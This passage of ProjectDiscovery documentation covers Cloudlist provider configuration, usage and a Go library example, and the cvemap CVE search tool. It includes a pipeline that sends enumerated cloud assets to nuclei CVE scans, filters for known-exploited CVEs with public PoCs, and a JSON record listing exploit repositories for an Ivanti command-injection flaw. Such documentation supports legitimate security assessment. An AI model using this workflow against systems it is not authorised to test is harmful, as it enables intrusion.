`fastly_api_key` can be generated from [https://manage.fastly.com/account/personal/tokens](https://manage.fastly.com/account/personal/tokens)
References:
1. [https://docs.fastly.com/en/guides/using-api-tokens#creating-api-tokens](https://docs.fastly.com/en/guides/using-api-tokens#creating-api-tokens)
### Namecheap
Supported Namecheap Services:
* Domain List
**Example Config:**
Namecheap can be integrated by using the following configuration block.
```yaml
- provider: namecheap # provider is the name of the provider
# id is the name defined by user for filtering (optional)
id: staging
# namecheap_api_key is the api key for namecheap account
namecheap_api_key: $NAMECHEAP_API_KEY
# namecheap_user_name is the username of the namecheap account
namecheap_user_name: $NAMECHEAP_USER_NAME
```
Namecheap API Access can be enabled by visiting [https://ap.www.namecheap.com/settings/tools/apiaccess/](https://ap.www.namecheap.com/settings/tools/apiaccess/) and then:
* Toggle on the API Access switch
* Add your public IP to Whitelisted IPs
References:
1. [https://www.namecheap.com/support/api/intro/](https://www.namecheap.com/support/api/intro/)
* Enabling API Access
* Whitelisting IP
### Cloudflare
Supported Cloudflare Services:
* DNS
**Example Config:**
Cloudflare can be integrated by using the following configuration block.
```yaml
- provider: cloudflare # provider is the name of the provider
# email is the email for cloudflare
email: $CF_EMAIL
# api_key is the api_key for cloudflare
api_key: $CF_API_KEY
# api_token is the scoped_api_token for cloudflare (optional)
api_token: $CF_API_TOKEN
```
`api_key` can be generated from the Cloudflare API Key manager. It needs to be the Global API Key due to a limitation of Cloudflare's new API tokens.
References:
1. [https://developers.cloudflare.com/api/keys](https://developers.cloudflare.com/api/keys)
### Hetzner Cloud
Supported Hetzner Cloud Services:
* Instances
**Example Config:**
Hetzner Cloud can be integrated by using the following configuration block.
```yaml
- provider: hetzner # provider is the name of the provider
# id is the name defined by user for filtering (optional)
id: staging
# auth_token is the hetzner authentication token
auth_token: $HETZNER_AUTH_TOKEN
```
References:
1. [https://docs.hetzner.cloud/#authentication](https://docs.hetzner.cloud/#authentication)
## Infrastructure Automation & Management
### Kubernetes (K8s)
Supported Kubernetes Services:
* Services
* Ingresses
**Example Config:**
To integrate Kubernetes, use the configuration block outlined below. This block allows you to specify Kubernetes connection details either through a file path or directly by providing the encoded kubeconfig content. If both `kubeconfig_file` and `kubeconfig_encoded` are specified, `kubeconfig_encoded` will take precedence.
```yaml
- provider: kubernetes # provider is the name of the provider
# id is the name of the provider id
id: staging
# kubeconfig_file is the path of kubeconfig file
kubeconfig: path/to/kubeconfig
# context is the context to be used from kubeconfig file
context:
```
References:
1. [https://www.redhat.com/sysadmin/kubeconfig](https://www.redhat.com/sysadmin/kubeconfig)
2. [https://docs.aws.amazon.com/eks/latest/userguide/create-kubeconfig.html](https://docs.aws.amazon.com/eks/latest/userguide/create-kubeconfig.html)
3. [https://learn.microsoft.com/en-us/azure/aks/control-kubeconfig-access#get-and-verify-the-configuration-information](https://learn.microsoft.com/en-us/azure/aks/control-kubeconfig-access#get-and-verify-the-configuration-information)
4. [https://cloud.google.com/kubernetes-engine/docs/how-to/cluster-access-for-kubectl#store\_info](https://cloud.google.com/kubernetes-engine/docs/how-to/cluster-access-for-kubectl#store_info)
### Hashicorp Tools
With Cloudlist you can get assets from Nomad, Consul, and Terraform. Cloudlist can query Nomad and Consul directly, and will use the Terraform state file to list Terraform-created assets.
#### Nomad
Hashicorp Nomad can be integrated by using the following configuration block.
**Example Config:**
```yaml
- provider: nomad # provider is the name of the provider
# nomad_url is the url for nomad server
nomad_url: http://127.0.0.1:4646/
# nomad_ca_file is the path to nomad CA file
# nomad_ca_file: .pem
# nomad_cert_file is the path to nomad Certificate file
# nomad_cert_file: .pem
# nomad_key_file is the path to nomad Certificate Key file
# nomad_key_file: .pem
# nomad_token is the nomad authentication token
# nomad_token:
# nomad_http_auth is the nomad http auth value
# nomad_http_auth:
```
Specifying https in the `nomad_url` automatically turns SSL on. All fields are optional except `nomad_url`.
References:
1. [https://www.nomadproject.io/api-docs](https://www.nomadproject.io/api-docs)
#### Consul
Hashicorp Consul can be integrated by using the following configuration block.
**Example Config:**
```yaml
- provider: consul # provider is the name of the provider
# consul_url is the url for consul server
consul_url: http://localhost:8500/
# consul_ca_file is the path to consul CA file
# consul_ca_file: .pem
# consul_cert_file is the path to consul Certificate file
# consul_cert_file: .pem
# consul_key_file is the path to consul Certificate Key file
# consul_key_file: .pem
# consul_http_token is the consul authentication token
# consul_http_token:
# consul_http_auth is the consul http auth value
# consul_http_auth:
```
Specifying https in the `consul_url` automatically turns SSL on. All fields are optional except `consul_url`.
References:
1. [https://www.consul.io/api-docs](https://www.consul.io/api-docs)
#### Terraform
**Example Config:**
Terraform can be integrated by using the following configuration block.
```yaml
- provider: terraform # provider is the name of the provider
# id is the name defined by user for filtering (optional)
id: staging
#tf_state_file is the location of terraform state file (terraform.tfstate)
tf_state_file: path/to/terraform.tfstate
```
### OpenStack
Supported OpenStack Services:
* Instances
**Example Config:**
```yaml
- provider: openstack # provider is the name of the provider
# id is the name of the provider id
id: staging
# identity_endpoint is OpenStack identity endpoint used to authenticate
identity_endpoint: $OS_IDENTITY_ENDPOINT
# domain_name is OpenStack domain name used to authenticate
domain_name: $OS_DOMAIN_NAME
# tenant_name is OpenStack project name
tenant_name: $OS_TENANT_NAME
# username is OpenStack username used to authenticate
username: $OS_USERNAME
# password is OpenStack password used to authenticate
password: $OS_PASSWORD
```
# Running Cloudlist
Source: https://docs.projectdiscovery.io/tools/cloudlist/running
Learn about running Cloudlist with examples and support details
For all of the flags and options available for `cloudlist` be sure to check out the [Usage](/tools/cloudlist/usage) page. On this page you can find some examples with output, details of what 'cloudlist' supports, and details on configuration.
If you have questions, reach out to us through [Help](/help).
## Basic Examples
```
cloudlist
```
This will list all the assets from the providers configured in the configuration file. Specific providers and configuration ids can also be selected using the `-provider` and `-id` filters.
```console
cloudlist -provider aws,gcp
________ _____ __
/ ____/ /___ __ ______/ / (_)____/ /_
/ / / / __ \/ / / / __ / / / ___/ __/
/ /___/ / /_/ / /_/ / /_/ / / (__ ) /_
\____/_/\____/\__,_/\__,_/_/_/____/\__/ v0.0.1
projectdiscovery.io
[WRN] Use with caution. You are responsible for your actions
[WRN] Developers assume no liability and are not responsible for any misuse or damage.
[INF] Listing assets from AWS (prod) provider.
example.com
example2.com
example3.com
1.1.1.1
2.2.2.2
3.3.3.3
4.4.4.4
5.5.5.5
6.6.6.6
[INF] Found 2 hosts and 6 IPs from AWS service (prod)
```
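To narrow results further, the `-id` filter selects a specific configuration block by its user-defined id, and `-host` / `-ip` restrict the output type. For example, using the `staging` id from the sample provider config:
```bash
# only hostnames from the AWS block labelled "staging"
cloudlist -provider aws -id staging -host

# only IP addresses from the same block, as JSON
cloudlist -provider aws -id staging -ip -json
```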
## Running cloudlist with Nuclei
Scanning assets from various cloud providers with nuclei for security assessments:
```bash
cloudlist -silent | httpx -silent | nuclei -t cves/
```
## Supported providers
For a full list of supported cloud providers, see [Cloud Providers](/tools/cloudlist/providers).
## Configuration file
The default provider config file should be located at `$HOME/.config/cloudlist/provider-config.yaml`; an example of its contents is shown below. In order to run this tool, the keys need to be updated in the config file for the desired providers.
### Example Provider Config
```yaml
- provider: do # provider is the name of the provider
# id is the name defined by user for filtering (optional)
id: xxxx
# digitalocean_token is the API key for digitalocean cloud platform
digitalocean_token: $DIGITALOCEAN_TOKEN
- provider: scw # provider is the name of the provider
# scaleway_access_key is the access key for scaleway API
scaleway_access_key: $SCALEWAY_ACCESS_KEY
# scaleway_access_token is the access token for scaleway API
scaleway_access_token: $SCALEWAY_ACCESS_TOKEN
- provider: aws # provider is the name of the provider
# id is the name defined by user for filtering (optional)
id: staging
# aws_access_key is the access key for AWS account
aws_access_key: $AWS_ACCESS_KEY
# aws_secret_key is the secret key for AWS account
aws_secret_key: $AWS_SECRET_KEY
# aws_session_token session token for temporary security credentials retrieved via STS (optional)
aws_session_token: $AWS_SESSION_TOKEN
- provider: gcp # provider is the name of the provider
# profile is the name of the provider profile
id: logs
# gcp_service_account_key is the minified json of a google cloud service account with list permissions
gcp_service_account_key: '{xxxxxxxxxxxxx}'
- provider: azure # provider is the name of the provider
# id is the name defined by user for filtering (optional)
id: staging
# client_id is the client ID of the registered application of the azure account (not required if using cli auth)
client_id: $AZURE_CLIENT_ID
# client_secret is the secret ID of the registered application of the azure account (not required if using cli auth)
client_secret: $AZURE_CLIENT_SECRET
# tenant_id is the tenant ID of the registered application of the azure account (not required if using cli auth)
tenant_id: $AZURE_TENANT_ID
#subscription_id is the azure subscription id
subscription_id: $AZURE_SUBSCRIPTION_ID
#use_cli_auth if set to true cloudlist will use azure cli auth
use_cli_auth: true
- provider: cloudflare # provider is the name of the provider
# email is the email for cloudflare
email: $CF_EMAIL
# api_key is the api_key for cloudflare
api_key: $CF_API_KEY
# api_token is the scoped_api_token for cloudflare (optional)
api_token: $CF_API_TOKEN
- provider: heroku # provider is the name of the provider
# id is the name defined by user for filtering (optional)
id: staging
# heroku_api_token is the api key for Heroku account
heroku_api_token: $HEROKU_API_TOKEN
- provider: linode # provider is the name of the provider
# id is the name defined by user for filtering (optional)
id: staging
# linode_personal_access_token is the personal access token for linode account
linode_personal_access_token: $LINODE_PERSONAL_ACCESS_TOKEN
- provider: fastly # provider is the name of the provider
# id is the name defined by user for filtering (optional)
id: staging
# fastly_api_key is the personal API token for fastly account
fastly_api_key: $FASTLY_API_KEY
- provider: alibaba # provider is the name of the provider
# id is the name defined by user for filtering (optional)
id: staging
# alibaba_region_id is the region id of the resources
alibaba_region_id: $ALIBABA_REGION_ID
# alibaba_access_key is the access key ID for alibaba cloud account
alibaba_access_key: $ALIBABA_ACCESS_KEY
# alibaba_access_key_secret is the secret access key for alibaba cloud account
alibaba_access_key_secret: $ALIBABA_ACCESS_KEY_SECRET
- provider: namecheap # provider is the name of the provider
# id is the name defined by user for filtering (optional)
id: staging
# namecheap_api_key is the api key for namecheap account
namecheap_api_key: $NAMECHEAP_API_KEY
# namecheap_user_name is the username of the namecheap account
namecheap_user_name: $NAMECHEAP_USER_NAME
- provider: terraform # provider is the name of the provider
# id is the name defined by user for filtering (optional)
id: staging
#tf_state_file is the location of terraform state file (terraform.tfstate)
tf_state_file: path/to/terraform.tfstate
- provider: hetzner # provider is the name of the provider
# id is the name defined by user for filtering (optional)
id: staging
# auth_token is the hetzner authentication token
auth_token: $HETZNER_AUTH_TOKEN
- provider: nomad # provider is the name of the provider
# nomad_url is the url for nomad server
nomad_url: http://127.0.0.1:4646/
# nomad_ca_file is the path to nomad CA file
# nomad_ca_file: .pem
# nomad_cert_file is the path to nomad Certificate file
# nomad_cert_file: .pem
# nomad_key_file is the path to nomad Certificate Key file
# nomad_key_file: .pem
# nomad_token is the nomad authentication token
# nomad_token:
# nomad_http_auth is the nomad http auth value
# nomad_http_auth:
- provider: consul # provider is the name of the provider
# consul_url is the url for consul server
consul_url: http://localhost:8500/
# consul_ca_file is the path to consul CA file
# consul_ca_file: .pem
# consul_cert_file is the path to consul Certificate file
# consul_cert_file: .pem
# consul_key_file is the path to consul Certificate Key file
# consul_key_file: .pem
# consul_http_token is the consul authentication token
# consul_http_token:
# consul_http_auth is the consul http auth value
# consul_http_auth:
- provider: openstack # provider is the name of the provider
# id is the name of the provider id
id: staging
# identity_endpoint is OpenStack identity endpoint used to authenticate
identity_endpoint: $OS_IDENTITY_ENDPOINT
# domain_name is OpenStack domain name used to authenticate
domain_name: $OS_DOMAIN_NAME
# tenant_name is OpenStack project name
tenant_name: $OS_TENANT_NAME
# username is OpenStack username used to authenticate
username: $OS_USERNAME
# password is OpenStack password used to authenticate
password: $OS_PASSWORD
- provider: kubernetes # provider is the name of the provider
# id is the name of the provider id
id: staging
# kubeconfig_file is the path of kubeconfig file
kubeconfig: path/to/kubeconfig
# context is the context to be used from kubeconfig file
context:
```
## Cloudlist as a library
It's possible to use the library directly in your Go programs. The following code snippet outlines how to list assets from all or a given cloud provider.
```go
package main
import (
"context"
"log"
"github.com/projectdiscovery/cloudlist/pkg/inventory"
"github.com/projectdiscovery/cloudlist/pkg/schema"
)
func main() {
inventory, err := inventory.New(schema.Options{
schema.OptionBlock{"provider": "digitalocean", "digitalocean_token": "ec405badb974fd3d891c9223245f9ab5871c127fce9e632c8dc421edd46d7242"},
})
if err != nil {
log.Fatalf("%s\n", err)
}
for _, provider := range inventory.Providers {
resources, err := provider.Resources(context.Background())
if err != nil {
log.Fatalf("%s\n", err)
}
for _, resource := range resources.Items {
_ = resource // Do something with the resource
}
}
}
```
# Cloudlist Usage
Source: https://docs.projectdiscovery.io/tools/cloudlist/usage
Learn Cloudlist usage including flags and filters
## Access help
Use `cloudlist -h` to display all of the help options.
## Cloudlist options
```console
Cloudlist is a tool for listing Assets from multiple cloud providers.
Usage:
./cloudlist [flags]
Flags:
CONFIGURATION:
-config string cloudlist flag config file (default "$HOME/.config/cloudlist/config.yaml")
-pc, -provider-config string provider config file (default "$HOME/.config/cloudlist/provider-config.yaml")
FILTERS:
-p, -provider value display results for given providers (comma-separated) (default linode,fastly,heroku,terraform,digitalocean,consul,cloudflare,hetzner,nomad,do,scw,openstack,alibaba,aws,gcp,namecheap,kubernetes,azure)
-id string[] display results for given ids (comma-separated)
-host display only hostnames in results
-ip display only ips in results
-s, -service value query and display results from given service (comma-separated)) (default cloudfront,gke,domain,compute,ec2,instance,cloud-function,app,eks,consul,droplet,vm,ecs,fastly,alb,s3,lambda,elb,cloud-run,route53,publicip,dns,service,nomad,lightsail,ingress,apigateway)
-ep, -exclude-private exclude private ips in cli output
UPDATE:
-up, -update update cloudlist to latest version
-duc, -disable-update-check disable automatic cloudlist update check
OUTPUT:
-o, -output string output file to write results
-json write output in json format
-version display version of cloudlist
-v display verbose output
-silent display only results in output
```
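As an illustration of combining these filters, the invocation below lists only public hostnames from the Route53 and DNS services and writes them to a file (the service names come from the defaults shown above; the output file name is a placeholder):
```bash
# public DNS hostnames only, written to dns-hosts.txt
cloudlist -s route53,dns -host -ep -o dns-hosts.txt
```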
# Installing cvemap
Source: https://docs.projectdiscovery.io/tools/cvemap/install
Learn about how to install and get started with cvemap
To access the cvemap API data you need a ProjectDiscovery Cloud Platform (PDCP) account and API key. Check out [Running](/tools/cvemap/running) for details. Enter the command below in a terminal to install ProjectDiscovery's cvemap using Go.
```bash
go install github.com/projectdiscovery/cvemap/cmd/cvemap@latest
```
## Installation Notes
* cvemap requires the latest version of [**Go**](https://go.dev/doc/install)
* Add the Go bin path to the system paths. On macOS or Linux, in your terminal use
```
echo 'export PATH=$PATH:$HOME/go/bin' >> $HOME/.bashrc
source $HOME/.bashrc
```
* To add the Go bin path in Windows, [click this link for instructions.](https://www.architectryan.com/2018/03/17/add-to-the-path-on-windows-10/)
* The binary will be located in `$HOME/go/bin/cvemap`
# cvemap overview
Source: https://docs.projectdiscovery.io/tools/cvemap/overview
A structured and easy way to navigate public CVE sources
## What is cvemap?
cvemap is a tool that provides a structured and easily navigable way to explore CVEs from the command line.
ProjectDiscovery's cvemap combines data from multiple public sources including:
* NVD (NIST) database of CVEs
* CISA database of CVEs and Known Exploited Vulnerabilities (KEVs)
* Data from HackerOne's CVE Discovery about the most frequently reported CVEs in their system
* Data about EPSS scoring and the mapping to Common Platform Enumeration (CPE)
* Data about public PoCs that might be available on GitHub along with the status of any Nuclei Template for fingerprinting the CVE
Read more about cvemap [on our blog](https://blog.projectdiscovery.io/announcing-cvemap-from-projectdiscovery/)
## Features and capabilities
* CVE Dataset Search & Query
* CVE to EPSS Mapping
* CVE to KEV Mapping
* CVE to CPE Mapping
* CVE to GitHub POCs Mapping
* CVE to Nuclei Template Mapping
* CVE to HackerOne report Mapping
* Customizable Filters on CVE data
* STDIN Input / JSONL Output
## Support
Questions about using cvemap? Issues working through installation? Cool story or use case you want to share? Get in touch!
Check out the [Help](/help) section of the docs or reach out to us on [Discord](https://discord.com/invite/projectdiscovery).
# Running cvemap
Source: https://docs.projectdiscovery.io/tools/cvemap/running
Learn about running cvemap with examples including commands and output
For all of the flags and options available for `cvemap` be sure to check out the [Usage](/tools/cvemap/usage) page. On this page we'll share examples running `cvemap` with specific flags and goals
and the output you can expect from each.
*If you have questions, reach out to us through [Help](/help).*
## Prerequisites for cvemap
Before using cvemap, you'll need to get a ProjectDiscovery Cloud Platform (PDCP) account and API key so that you can access the cvemap API data.
Navigate to [https://cloud.projectdiscovery.io/](https://cloud.projectdiscovery.io/) and click “Sign Up” (or “Sign In” if you already have a PDCP account).
Once signed into ProjectDiscovery Cloud Platform, you can navigate to [https://cloud.projectdiscovery.io/?ref=api\_key](https://cloud.projectdiscovery.io/?ref=api_key) to find your API Key.
Use the copy button to copy your API Key - we need this to authenticate your install.
To authenticate your install of cvemap, run
```bash
cvemap -auth
```
When prompted, paste the key you obtained above.
## Basic Examples
By default, `cvemap` lists CVEs marked as known exploited vulnerabilities, as published by [CISA](https://www.cisa.gov/known-exploited-vulnerabilities-catalog).
### List top known exploited vulnerabilities
```bash
$ cvemap -limit 10
______ _____ ____ ___ ____ ____
/ ___/ | / / _ \/ __ \__ \/ __ \/ __ \
/ /__ | |/ / __/ / / / / / /_/ / /_/ /
\___/ |___/\___/_/ /_/ /_/\__,_/ .___/
/_/
projectdiscovery.io
```
```markdown
| ID | CVSS | SEVERITY | EPSS | PRODUCT | TEMPLATE | AGE |
|---------------|------|----------|---------|-----------------------|----------|-----|
| CVE-2023-5631 | 5.4 | MEDIUM | 0.00986 | webmail | ❌ | 18 |
| CVE-2023-5217 | 8.8 | HIGH | 0.26047 | libvpx | ❌ | 38 |
| CVE-2023-4966 | 7.5 | HIGH | 0.92267 | netscaler_application | ✅ | 26 |
| CVE-2023-4863 | 8.8 | HIGH | 0.4101 | chrome | ❌ | 54 |
| CVE-2023-46748| 8.8 | HIGH | 0.00607 | | ❌ | 10 |
| CVE-2023-46747| 9.8 | CRITICAL | 0.95304 | | ✅ | 10 |
| CVE-2023-46604| 10 | CRITICAL | 0.01596 | | ✅ | 9 |
| CVE-2023-44487| 7.5 | HIGH | 0.52748 | http | ❌ | 26 |
| CVE-2023-42824| 7.8 | HIGH | 0.00062 | ipados | ❌ | 32 |
| CVE-2023-42793| 9.8 | CRITICAL | 0.97264 | teamcity | ✅ | 47 |
```
### List top CVEs on HackerOne
List the top CVEs reported on the HackerOne platform using the `-h1` or `-hackerone` option.
```bash
$ cvemap -h1
```
```markdown
| CVE | CVSS | SEVERITY | RANK | REPORTS | PRODUCT | TEMPLATE | AGE |
|----------------|------|----------|------|---------|----------------------|----------|------|
| CVE-2020-35946 | 5.4 | MEDIUM | 1 | 304 | all_in_one_seo_pack | ❌ | 1038 |
| CVE-2023-4966 | 7.5 | HIGH | 2 | 54 | netscaler_application| ✅ | 26 |
| CVE-2023-22518 | 9.1 | CRITICAL | 3 | 27 | | ✅ | 5 |
| CVE-2017-15277 | 6.5 | MEDIUM | 4 | 1139 | graphicsmagick | ❌ | 2215 |
| CVE-2023-35813 | 9.8 | CRITICAL | 5 | 54 | experience_commerce | ✅ | 141 |
| CVE-2022-38463 | 6.1 | MEDIUM | 6 | 342 | servicenow | ✅ | 439 |
| CVE-2020-11022 | 6.1 | MEDIUM | 7 | 209 | jquery | ❌ | 1285 |
| CVE-2020-11023 | 6.1 | MEDIUM | 8 | 208 | jquery | ❌ | 1285 |
| CVE-2023-38205 | 7.5 | HIGH | 9 | 162 | coldfusion | ✅ | 52 |
| CVE-2019-11358 | 6.1 | MEDIUM | 10 | 214 | jquery | ❌ | 1660 |
```
cvemap provides multiple ways to query CVE data, e.g. by `product`, `vendor`, `severity`, `cpe`, `assignee`, `cvss-score`, `epss-score`, `age`, etc. For example:
### List all CVEs for Confluence
List all the CVEs published for Atlassian Confluence:
```bash
cvemap -product confluence -l 5
```
```markdown
| ID | CVSS | SEVERITY | EPSS | PRODUCT | TEMPLATE |
|---------------|------|----------|---------|------------|----------|
| CVE-2020-4027 | 4.7 | MEDIUM | 0.00105 | confluence | ❌ |
| CVE-2019-3398 | 8.8 | HIGH | 0.97342 | confluence | ✅ |
| CVE-2019-3396 | 9.8 | CRITICAL | 0.97504 | confluence | ✅ |
| CVE-2019-3395 | 9.8 | CRITICAL | 0.07038 | confluence | ❌ |
| CVE-2019-3394 | 8.8 | HIGH | 0.1885 | confluence | ❌ |
```
By default, cvemap displays a limited set of fields, which can be customized and controlled using the `-field` / `-f` option, for example:
```bash
$ cvemap -severity critical -field assignee,vstatus,poc -l 5
```
```markdown
| ID | CVSS | SEVERITY | EPSS | PRODUCT | TEMPLATE | ASSIGNEE | VSTATUS | POC |
|---------------|------|----------|---------|------------------|----------|------------------------|-------------|-------|
| CVE-2023-5843 | 9 | CRITICAL | 0.00053 | | ❌ | security@wordfence.com | UNCONFIRMED | FALSE |
| CVE-2023-5832 | 9.1 | CRITICAL | 0.00043 | | ❌ | security@huntr.dev | UNCONFIRMED | FALSE |
| CVE-2023-5824 | 9.6 | CRITICAL | 0.00045 | | ❌ | secalert@redhat.com | UNCONFIRMED | FALSE |
| CVE-2023-5820 | 9.6 | CRITICAL | 0.00047 | | ❌ | security@wordfence.com | UNCONFIRMED | FALSE |
| CVE-2023-5807 | 9.8 | CRITICAL | 0.00076 | education_portal | ❌ | cve@usom.gov.tr | CONFIRMED | FALSE |
```
To list CVEs matching a threshold, such as a CVSS score or EPSS score / percentile, the options below can be used:
```bash
$ cvemap -silent -cs '> 7' -es '> 0.00053' -l 5
```
```markdown
| ID | CVSS | SEVERITY | EPSS | PRODUCT | TEMPLATE |
|---------------|------|----------|---------|---------------------------------------|----------|
| CVE-2023-5860 | 7.2 | HIGH | 0.00132 | | ❌ |
| CVE-2023-5843 | 9 | CRITICAL | 0.00053 | | ❌ |
| CVE-2023-5807 | 9.8 | CRITICAL | 0.00076 | education_portal | ❌ |
| CVE-2023-5804 | 9.8 | CRITICAL | 0.00063 | nipah_virus_testing_management_system | ❌ |
| CVE-2023-5802 | 8.8 | HIGH | 0.00058 | wp_knowledgebase | ❌ |
```
To filter CVEs matching specific conditions, such as CVEs that have a public PoC or template and are in the KEV list, the options below can be used:
```bash
$ cvemap -silent -template=false -poc=true -kev=true -l 5 -f poc,kev
```
```markdown
| ID | CVSS | SEVERITY | EPSS | PRODUCT | TEMPLATE | POC | KEV |
|----------------|------|----------|---------|---------|----------|------|------|
| CVE-2023-5631 | 5.4 | MEDIUM | 0.00986 | webmail | ❌ | TRUE | TRUE |
| CVE-2023-5217 | 8.8 | HIGH | 0.26047 | libvpx | ❌ | TRUE | TRUE |
| CVE-2023-4863 | 8.8 | HIGH | 0.4101 | chrome | ❌ | TRUE | TRUE |
| CVE-2023-44487 | 7.5 | HIGH | 0.52748 | http | ❌ | TRUE | TRUE |
| CVE-2023-41993 | 9.8 | CRITICAL | 0.00617 | safari | ❌ | TRUE | TRUE |
```
### Return CVE IDs only
To return only CVE IDs, the `-lsi` or `-list-id` flag can be used along with any existing cvemap filter or search.
```bash
cvemap -kev -limit 10 -list-id
CVE-2024-21887
CVE-2024-0519
CVE-2023-7101
CVE-2023-7024
CVE-2023-6549
CVE-2023-6548
CVE-2023-6448
CVE-2023-6345
CVE-2023-5631
CVE-2023-5217
```
### JSON Output
```bash
$ echo CVE-2024-21887 | cvemap -json
```
```json
[
{
"cve_id": "CVE-2024-21887",
"cve_description": "A command injection vulnerability in web components of Ivanti Connect Secure (9.x, 22.x) and Ivanti Policy Secure (9.x, 22.x) allows an authenticated administrator to send specially crafted requests and execute arbitrary commands on the appliance.",
"severity": "critical",
"cvss_score": 9.1,
"cvss_metrics": {
"cvss30": {
"score": 9.1,
"vector": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H",
"severity": "critical"
},
"cvss31": {
"score": 9.1,
"vector": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H",
"severity": "critical"
}
},
"weaknesses": [
{
"cwe_id": "CWE-77",
"cwe_name": "Improper Neutralization of Special Elements used in a Command ('Command Injection')"
}
],
"epss": {
"epss_score": 0.95688,
"epss_percentile": 0.99289
},
"cpe": {
"cpe": "cpe:2.3:a:ivanti:connect_secure:9.0:*:*:*:*:*:*:*",
"vendor": "ivanti",
"product": "connect_secure"
},
"reference": [
"http://packetstormsecurity.com/files/176668/Ivanti-Connect-Secure-Unauthenticated-Remote-Code-Execution.html"
],
"poc": [
{
"url": "https://github.com/tucommenceapousser/CVE-2024-21887",
"source": "gh-nomi-sec",
"added_at": "2024-01-20T19:15:23Z"
},
{
"url": "https://github.com/mickdec/CVE-2023-46805_CVE-2024-21887_scan_grouped",
"source": "gh-nomi-sec",
"added_at": "2024-01-19T08:11:31Z"
},
{
"url": "https://github.com/seajaysec/Ivanti-Connect-Around-Scan",
"source": "gh-nomi-sec",
"added_at": "2024-01-19T02:12:11Z"
},
{
"url": "https://github.com/raminkarimkhani1996/CVE-2023-46805_CVE-2024-21887",
"source": "gh-nomi-sec",
"added_at": "2024-01-18T13:25:46Z"
},
{
"url": "https://github.com/TheRedDevil1/Check-Vulns-Script",
"source": "gh-nomi-sec",
"added_at": "2024-01-17T10:29:02Z"
},
{
"url": "https://github.com/Chocapikk/CVE-2024-21887",
"source": "gh-nomi-sec",
"added_at": "2024-01-16T20:59:38Z"
},
{
"url": "https://github.com/duy-31/CVE-2023-46805_CVE-2024-21887",
"source": "gh-nomi-sec",
"added_at": "2024-01-16T19:40:59Z"
},
{
"url": "https://github.com/rxwx/pulse-meter",
"source": "gh-nomi-sec",
"added_at": "2024-01-16T19:19:52Z"
},
{
"url": "https://github.com/oways/ivanti-CVE-2024-21887",
"source": "gh-nomi-sec",
"added_at": "2024-01-14T09:25:56Z"
}
],
"vendor_advisory": "https://forums.ivanti.com/s/article/CVE-2023-46805-Authentication-Bypass-CVE-2024-21887-Command-Injection-for-Ivanti-Connect-Secure-and-Ivanti-Policy-Secure-Gateways?language=en_US",
"is_template": true,
"nuclei_templates": {
"template_path": "http/cves/2024/CVE-2024-21887.yaml",
"template_url": "https://cloud.projectdiscovery.io/public/CVE-2024-21887",
"created_at": "2024-01-17T02:23:45+05:30",
"updated_at": "2024-01-16T21:14:22Z"
},
"is_exploited": true,
"kev": {
"added_date": "2024-01-10",
"due_date": "2024-01-22"
},
"assignee": "support@hackerone.com",
"published_at": "2024-01-12T17:15:10.017",
"updated_at": "2024-01-22T17:15:09.523",
"hackerone": {
"rank": 6345,
"count": 0
},
"age_in_days": 10,
"vuln_status": "modified",
"is_poc": true,
"is_remote": false,
"is_oss": false,
"vulnerable_cpe": [
"cpe:2.3:a:ivanti:connect_secure:9.0:*:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:connect_secure:9.1:r1:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:connect_secure:9.1:r10:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:connect_secure:9.1:r11:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:connect_secure:9.1:r11.3:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:connect_secure:9.1:r11.4:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:connect_secure:9.1:r11.5:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:connect_secure:9.1:r12:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:connect_secure:9.1:r12.1:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:connect_secure:9.1:r13:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:connect_secure:9.1:r13.1:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:connect_secure:9.1:r14:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:connect_secure:9.1:r15:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:connect_secure:9.1:r15.2:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:connect_secure:9.1:r16:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:connect_secure:9.1:r16.1:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:connect_secure:9.1:r17:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:connect_secure:9.1:r17.1:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:connect_secure:9.1:r18:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:connect_secure:9.1:r2:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:connect_secure:9.1:r3:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:connect_secure:9.1:r4:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:connect_secure:9.1:r4.1:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:connect_secure:9.1:r4.2:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:connect_secure:9.1:r4.3:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:connect_secure:9.1:r5:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:connect_secure:9.1:r6:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:connect_secure:9.1:r7:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:connect_secure:9.1:r8:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:connect_secure:9.1:r8.1:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:connect_secure:9.1:r8.2:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:connect_secure:9.1:r9:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:connect_secure:9.1:r9.1:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:connect_secure:22.1:r1:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:connect_secure:22.1:r6:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:connect_secure:22.2:-:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:connect_secure:22.2:r1:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:connect_secure:22.3:r1:*:*:*:*:*:*",
